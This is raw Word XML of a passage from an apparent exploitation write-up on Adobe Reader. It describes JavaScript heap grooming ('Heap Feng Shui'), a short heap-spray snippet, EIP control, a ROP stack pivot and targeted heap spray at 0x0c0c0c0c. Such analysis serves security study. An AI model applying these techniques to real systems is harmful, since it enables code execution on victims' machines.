            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FA2C47">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Link -&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="704" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EAF1DD" w:themeFill="accent3" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w:rsidR="00DA62C9" w:rsidRPr="00FA2C47" w:rsidRDefault="00DA62C9" w:rsidP="00D928B5">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DA62C9" w:rsidTr="00FD791B">
        <w:trPr>
          <w:trHeight w:val="269"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="959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</w:tr>
      <w:tr w:rsidR="00DA62C9" w:rsidTr="00FD791B">
        <w:trPr>
          <w:trHeight w:val="269"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="959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  <w:r w:rsidRPr="00FA2C47">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>ROP</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA2C47">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:br/>
              <w:t>Gadget</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="980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:rsidR="00DA62C9" w:rsidRPr="00FA2C47" w:rsidRDefault="00DA62C9" w:rsidP="00D928B5">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0070676D" w:rsidRDefault="0070676D" w:rsidP="00AB4F55"/>
    <w:p w:rsidR="00B820CC" w:rsidRDefault="00E57B6A" w:rsidP="00C44CF7">
      <w:r>
        <w:t>An attacker</w:t>
      </w:r>
      <w:r w:rsidR="00CD6282">
        <w:t xml:space="preserve"> needs to have control over the memory located in the grey heap illustrated above. </w:t>
      </w:r>
      <w:r w:rsidR="00840694">
        <w:t>In order to do this, the heap has to be prepared in a way that there would be heap of size 8 adjacent to a heap that an attacker has control over.</w:t>
      </w:r>
      <w:r w:rsidR="00B820CC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C05E9" w:rsidRDefault="00B820CC" w:rsidP="00AB4F55">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>To gain fine-control of the locations of 8 bytes heaps, an attacker can first use up all 8 bytes heap</w:t>
      </w:r>
      <w:r w:rsidR="00135291">
        <w:t xml:space="preserve"> chunks</w:t>
      </w:r>
      <w:r w:rsidR="00450FF2">
        <w:t xml:space="preserve"> in the Look-Aside List</w:t>
      </w:r>
      <w:r w:rsidR="00BE58DC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00135291">
        <w:t xml:space="preserve">and Free-List </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">by </w:t>
      </w:r>
      <w:r w:rsidR="00450FF2">
        <w:t>instantiating</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> strings of size smaller than 8 bytes, and not freeing them.</w:t>
      </w:r>
      <w:r w:rsidR="00450FF2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00450FF2" w:rsidRDefault="00450FF2" w:rsidP="00AB4F55">
      <w:r>
        <w:t>This is done by the following JavaScript snippet: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50FF2" w:rsidTr="00450FF2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9576" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00104527" w:rsidRDefault="00104527" w:rsidP="00104527">
            <w:r>
              <w:t>var x = new Array();</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00104527" w:rsidRDefault="00104527" w:rsidP="00104527">
            <w:r>
              <w:t>var i;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00104527" w:rsidRDefault="00104527" w:rsidP="00104527"/>
          <w:p w:rsidR="00E71A43" w:rsidRDefault="00E71A43" w:rsidP="00E71A43">
            <w:r>
              <w:t>function spray(esc_a) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E71A43" w:rsidRDefault="00E71A43" w:rsidP="00E71A43">
            <w:r>
              <w:tab/>
              <w:t>pointers_a = unescape(esc_a);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E71A43" w:rsidRDefault="00E71A43" w:rsidP="00E71A43">
            <w:r>
              <w:tab/>
              <w:t>for (i = 0; i &lt; 2000; i++) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E71A43" w:rsidRDefault="00E71A43" w:rsidP="00E71A43">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>x[i] = unescape("%udead")</w:t>
            </w:r>
            <w:r w:rsidR="00AD3C1E">
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E71A43" w:rsidRDefault="00E71A43" w:rsidP="00E71A43">
            <w:r>
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00450FF2" w:rsidRDefault="00E71A43" w:rsidP="00E71A43">
            <w:r>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00104527" w:rsidRDefault="00FE1070" w:rsidP="00AB4F55">
      <w:r>
        <w:t>The script</w:t>
      </w:r>
      <w:r w:rsidR="00104527">
        <w:t xml:space="preserve"> tries to assign the </w:t>
      </w:r>
      <w:r w:rsidR="00035056">
        <w:t>Unicode encoded characters to an a</w:t>
      </w:r>
      <w:r>
        <w:t>rray (</w:t>
      </w:r>
      <w:r w:rsidR="00104527">
        <w:t>%udead takes up 2 bytes</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00104527">
        <w:t>. Ho</w:t>
      </w:r>
      <w:r w:rsidR="00867E16">
        <w:t xml:space="preserve">wever, the heap </w:t>
      </w:r>
      <w:r w:rsidR="00135291">
        <w:t xml:space="preserve">chunk </w:t>
      </w:r>
      <w:r w:rsidR="00867E16">
        <w:t>size</w:t>
      </w:r>
      <w:r w:rsidR="00135291">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00BE58DC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00135291">
        <w:t>are</w:t>
      </w:r>
      <w:r w:rsidR="00867E16">
        <w:t xml:space="preserve"> in multiples of </w:t>
      </w:r>
      <w:r w:rsidR="00104527">
        <w:t xml:space="preserve">8, so a size 8 heap </w:t>
      </w:r>
      <w:r w:rsidR="00135291">
        <w:t xml:space="preserve">chunk </w:t>
      </w:r>
      <w:r w:rsidR="00104527">
        <w:t>would be allocated for this purpose. The script runs for 2000 iterations, using up all 8 bytes heap</w:t>
      </w:r>
      <w:r w:rsidR="00135291">
        <w:t xml:space="preserve"> chunks</w:t>
      </w:r>
      <w:r w:rsidR="00104527">
        <w:t xml:space="preserve"> available in the Look-Aside List</w:t>
      </w:r>
      <w:r w:rsidR="00135291">
        <w:t xml:space="preserve"> and Free List</w:t>
      </w:r>
      <w:r w:rsidR="00104527">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00104527" w:rsidRDefault="0049642E" w:rsidP="00AB4F55">
      <w:r>
        <w:t xml:space="preserve">From this point onwards, all 8 bytes </w:t>
      </w:r>
      <w:r w:rsidR="00135291">
        <w:t>allocations</w:t>
      </w:r>
      <w:r w:rsidR="00BE58DC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>would result in a larg</w:t>
      </w:r>
      <w:r w:rsidR="00F97B82">
        <w:t xml:space="preserve">er block being split, or </w:t>
      </w:r>
      <w:r w:rsidR="00866F31">
        <w:t>from</w:t>
      </w:r>
      <w:r w:rsidR="001B2CA1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002B4B04">
        <w:t xml:space="preserve">8 bytes heap released/freed </w:t>
      </w:r>
      <w:r>
        <w:t>later.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B820CC" w:rsidRDefault="00866F31" w:rsidP="00AB4F55">
      <w:r>
        <w:t>Using what is known as Heap Feng Shui,</w:t>
      </w:r>
      <w:r w:rsidR="006C7813">
        <w:t xml:space="preserve"> an attacker can</w:t>
      </w:r>
      <w:r w:rsidR="000A4C72">
        <w:t xml:space="preserve"> position</w:t>
      </w:r>
      <w:r w:rsidR="006C7813">
        <w:t xml:space="preserve"> future 8 bytes allocation to be adjacent to a heap that has been prepared prior</w:t>
      </w:r>
      <w:r w:rsidR="000732ED">
        <w:t xml:space="preserve">. In order to do this, </w:t>
      </w:r>
      <w:r w:rsidR="00541AD3">
        <w:t>an attacker needs to have knowledge of all heap allocations done by Adobe Reader after JavaScript has executed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00866936" w:rsidRDefault="00AD20F9" w:rsidP="00AB4F55">
      <w:r>
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:r w:rsidR="007C00A1">
        <w:t>simplicity</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> purpose, </w:t>
      </w:r>
      <w:r w:rsidR="002F630B">
        <w:t xml:space="preserve">we </w:t>
      </w:r>
      <w:r w:rsidR="00866936">
        <w:t xml:space="preserve">assume that Adobe Reader will </w:t>
      </w:r>
      <w:r w:rsidR="007C00A1">
        <w:t xml:space="preserve">only </w:t>
      </w:r>
      <w:r w:rsidR="00866936">
        <w:t>allocate heap</w:t>
      </w:r>
      <w:r w:rsidR="00135291">
        <w:t xml:space="preserve"> chunk</w:t>
      </w:r>
      <w:r w:rsidR="00866936">
        <w:t xml:space="preserve">s of size </w:t>
      </w:r>
      <w:r w:rsidR="00713146">
        <w:t>0x</w:t>
      </w:r>
      <w:r w:rsidR="00866936">
        <w:t xml:space="preserve">80 (without headers) </w:t>
      </w:r>
      <w:r w:rsidR="007C00A1">
        <w:t>after</w:t>
      </w:r>
      <w:r w:rsidR="00F735CF">
        <w:t xml:space="preserve"> the embedded</w:t>
      </w:r>
      <w:r w:rsidR="007C00A1">
        <w:t xml:space="preserve"> JavaScript has executed (we see that this is not true later on).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00221D9E" w:rsidRDefault="00B5694F" w:rsidP="00AB4F55">
      <w:r>
        <w:t xml:space="preserve">In order to produce a remaining heap </w:t>
      </w:r>
      <w:r w:rsidR="00135291">
        <w:t xml:space="preserve">chunk </w:t>
      </w:r>
      <w:r>
        <w:t>of size 8, the following can be done:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00713146" w:rsidRPr="008B1A93" w:rsidRDefault="00713146" w:rsidP="00713146">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Allocate 3 heaps of size 0x88.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="360" w:type="dxa"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2208"/>
        <w:gridCol w:w="2336"/>
        <w:gridCol w:w="2336"/>
        <w:gridCol w:w="2336"/>
      </w:tblGrid>
      <w:tr w:rsidR="00713146" w:rsidRPr="008B1A93" w:rsidTr="000D1624">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E5B8B7" w:themeFill="accent2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w:rsidR="00713146" w:rsidRPr="00FA2C47" w:rsidRDefault="00713146" w:rsidP="00713146">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FA2C47">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Earlier memory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2336" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="B8CCE4" w:themeFill="accent1" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w:rsidR="00A33F8F" w:rsidRDefault="00713146" w:rsidP="00713146">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FA2C47">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Header + 0x88 </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00713146" w:rsidRPr="00FA2C47" w:rsidRDefault="006A5D66" w:rsidP="00713146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 w:rsidR="00A33F8F">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Size: </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA2C47">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>0x90)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2336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 xml:space="preserve">Header + 0x88 </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00713146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 xml:space="preserve">Size: </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA2C47">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>0x90)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2336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 xml:space="preserve">Header + 0x88 </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00713146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 xml:space="preserve">Size: </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA2C47">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>0x90)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="000D1624" w:rsidRDefault="000D1624" w:rsidP="000D1624">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Free the first two 0x88 heaps, which would </w:t>
      </w:r>
      <w:r w:rsidR="008B1A93">
        <w:t xml:space="preserve">be </w:t>
      </w:r>
      <w:r>
        <w:t>coalesce</w:t>
      </w:r>
      <w:r w:rsidR="008B1A93">
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> together.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="360" w:type="dxa"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2208"/>
        <w:gridCol w:w="4672"/>
        <w:gridCol w:w="2336"/>
      </w:tblGrid>
      <w:tr w:rsidR="000D1624" w:rsidTr="000D1624">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E5B8B7" w:themeFill="accent2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w:rsidR="000D1624" w:rsidRPr="00FA2C47" w:rsidRDefault="000D1624" w:rsidP="00D928B5">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FA2C47">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Earlier memory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4672" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D6E3BC" w:themeFill="accent3" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w:rsidR="000D1624" w:rsidRPr="00FA2C47" w:rsidRDefault="00ED6E1C" w:rsidP="00037F5D">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FA2C47">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">0x120 </w:t>
            </w:r>
            <w:r w:rsidR="00037F5D" w:rsidRPr="00FA2C47">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>freed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2336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 xml:space="preserve">Header + 0x88 </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000D1624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 xml:space="preserve">Size: </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA2C47">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>0x90)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="000D1624" w:rsidRDefault="005F3574" w:rsidP="00B7662F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>After 2 heap allocations of size 0x80 is done by Adobe Reader.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="360" w:type="dxa"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1835"/>
        <w:gridCol w:w="1894"/>
        <w:gridCol w:w="1894"/>
        <w:gridCol w:w="1699"/>
        <w:gridCol w:w="1894"/>
      </w:tblGrid>
      <w:tr w:rsidR="005F3574" w:rsidTr="005F3574">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1835" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E5B8B7" w:themeFill="accent2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w:rsidR="005F3574" w:rsidRPr="00FA2C47" w:rsidRDefault="005F3574" w:rsidP="00D928B5">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FA2C47">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Earlier memory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1894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>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Header + 0x80</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005F3574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>Size: 0x88</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA2C47">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1894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>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Header + 0x80</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005F3574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>Size: 0x88</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA2C47">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>)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:rsidR="005F3574" w:rsidRPr="00FA2C47" w:rsidRDefault="005F3574" w:rsidP="00D928B5">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FA2C47">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>0x10 freed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1894" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="B8CCE4" w:themeFill="accent1" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w:rsidR="00A33F8F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 xml:space="preserve">Header + 0x88 </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005F3574" w:rsidRPr="00FA2C47" w:rsidRDefault="00A33F8F" w:rsidP="00A33F8F">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FA2C47">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Size: </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA2C47">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>0x90)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="005F3574" w:rsidRDefault="005F3574" w:rsidP="00037F5D"/>
    <w:p w:rsidR="00037F5D" w:rsidRDefault="00037F5D" w:rsidP="00037F5D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The remaining</w:t>
      </w:r>
      <w:r w:rsidR="00C43402">
        <w:t xml:space="preserve"> block of size</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0x1</w:t>
      </w:r>
      <w:r w:rsidR="00A80BB0">
        <w:t>0 will be placed back into the heap manager’s F</w:t>
      </w:r>
      <w:r>
        <w:t>ree</w:t>
      </w:r>
      <w:r w:rsidR="00A80BB0">
        <w:t>-L</w:t>
      </w:r>
      <w:r>
        <w:t>ist as a heap</w:t>
      </w:r>
      <w:r w:rsidR="00262D67">
        <w:t xml:space="preserve"> of size 8 (8 bytes for header), which fulfills criteria </w:t>
      </w:r>
      <w:r w:rsidR="00663B8F">
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidR="00262D67">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00663B8F">
        <w:t>, #2</w:t>
      </w:r>
      <w:r w:rsidR="00262D67">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00663B8F">
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidR="00262D67">
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="006A3E0C">
        <w:t xml:space="preserve"> This has to be done multiple times to increase reliability.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD3C1E" w:rsidRDefault="00C12D64" w:rsidP="00AB4F55">
      <w:r>
        <w:t>However, this is</w:t>
      </w:r>
      <w:r w:rsidR="00767CF5">
        <w:t xml:space="preserve"> based</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on the assumption that Adobe Reader only allocates heaps of size 0x80</w:t>
      </w:r>
      <w:r w:rsidR="00B940C0">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> which is definitely not true. By looking at all allocations done by Adobe Reader, an attacker can test and find a </w:t>
      </w:r>
      <w:r w:rsidR="005C0453">
        <w:t xml:space="preserve">suitable </w:t>
      </w:r>
      <w:r>
        <w:t>size that would result in the most reliable hea</w:t>
      </w:r>
      <w:r w:rsidR="007B1EC6">
        <w:t>p positi</w:t>
      </w:r>
      <w:r w:rsidR="007903E4">
        <w:t>oning for exploitation (</w:t>
      </w:r>
      <w:r w:rsidR="00B940C0">
        <w:t xml:space="preserve">size </w:t>
      </w:r>
      <w:r w:rsidR="007903E4">
        <w:t xml:space="preserve">0x88 turns out to be </w:t>
      </w:r>
      <w:r w:rsidR="007B1EC6">
        <w:t xml:space="preserve">the most reliable in this case). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A55DF3" w:rsidRDefault="00A80BB0" w:rsidP="00AB4F55">
      <w:r>
        <w:t xml:space="preserve">Now that the attacker </w:t>
      </w:r>
      <w:r w:rsidR="008C3A63">
        <w:t xml:space="preserve">has control over the EIP, </w:t>
      </w:r>
      <w:r w:rsidR="00D4298E">
        <w:t>using a ROP gadget, the attack</w:t>
      </w:r>
      <w:r w:rsidR="00F26259">
        <w:t xml:space="preserve">er could do a stack pivot </w:t>
      </w:r>
      <w:r w:rsidR="004C0CB9">
        <w:t>to a heap location with</w:t>
      </w:r>
      <w:r w:rsidR="00DC0636">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006A6E79">
        <w:t>shell code</w:t>
      </w:r>
      <w:r w:rsidR="00BD0092">
        <w:t xml:space="preserve"> sprayed </w:t>
      </w:r>
      <w:r w:rsidR="00D4298E">
        <w:t>prior.</w:t>
      </w:r>
      <w:r w:rsidR="00FD791B">
        <w:t xml:space="preserve"> Using a technique known as Targeted Heap Spray, an attacker would be able to perform a stack pivot to a more reliable heap location, ensuring </w:t>
      </w:r>
      <w:r w:rsidR="00312EC9">
        <w:t>consistent exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C85D4B" w:rsidRDefault="005E5E3F" w:rsidP="005E5E3F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc438718799"/>
      <w:r>
        <w:t xml:space="preserve">3.2.2 </w:t>
      </w:r>
      <w:r w:rsidR="005A062F">
        <w:t>Targeted Heap Spray</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w:rsidR="003041CB" w:rsidRDefault="008761AF" w:rsidP="00AB4F55">
      <w:r>
        <w:t xml:space="preserve">For explanation purpose, the address 0x0c0c0c0c would be taken as the location where the stack would be pivoted to. In this exploitation, as a ROP chain would be used, the ROP </w:t>
      </w:r>
      <w:r w:rsidR="00256657">
        <w:t>gadgets have</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to be placed at</w:t>
      </w:r>
      <w:r w:rsidR="00BC7E41">
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> specific location to ensure successful exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E01EB" w:rsidRDefault="00F91D30" w:rsidP="00AB4F55">
      <w:r>
        <w:t xml:space="preserve">Allocations at least 512K in size will be allocated using VirtualAlloc, which returns addresses that are page aligned (in the form of 0xXXXX0020). </w:t>
      </w:r>
      <w:r w:rsidR="002E01EB">
        <w:t xml:space="preserve">Using this knowledge, the shellcode can then be placed accurately in the heap.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C7044" w:rsidTr="000248A8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1915" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="003C7044" w:rsidRPr="000248A8" w:rsidRDefault="006A7BD5" w:rsidP="00AB4F55">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000248A8">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Address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3C7044" w:rsidRPr="000248A8" w:rsidRDefault="006A7BD5" w:rsidP="00AB4F55">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000248A8">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>0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3C7044" w:rsidRPr="000248A8" w:rsidRDefault="006A7BD5" w:rsidP="00AB4F55">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000248A8">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>4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3C7044" w:rsidRPr="000248A8" w:rsidRDefault="006A7BD5" w:rsidP="00AB4F55">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000248A8">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>8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3C7044" w:rsidRPr="000248A8" w:rsidRDefault="006A7BD5" w:rsidP="00AB4F55">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000248A8">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>C</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00933564" w:rsidTr="00BB5BDF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1915" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DBE5F1" w:themeFill="accent1" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w:rsidR="00933564" w:rsidRDefault="009A6CB8" w:rsidP="00AB4F55">
            <w:r>
              <w:t>0xXXX1</w:t>
            </w:r>
            <w:r w:rsidR="00933564">
              <w:t>0000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7661" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w:rsidR="00933564" w:rsidRDefault="00933564" w:rsidP="00933564">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>VirtualAlloc Chunk Header</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00933564" w:rsidTr="00BB5BDF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1915" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DBE5F1" w:themeFill="accent1" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w:rsidR="00933564" w:rsidRDefault="009A6CB8" w:rsidP="00AB4F55">
            <w:r>
              <w:t>0xXXX1</w:t>
            </w:r>
            <w:r w:rsidR="00933564">
              <w:t>0010</w:t>
            </w:r>
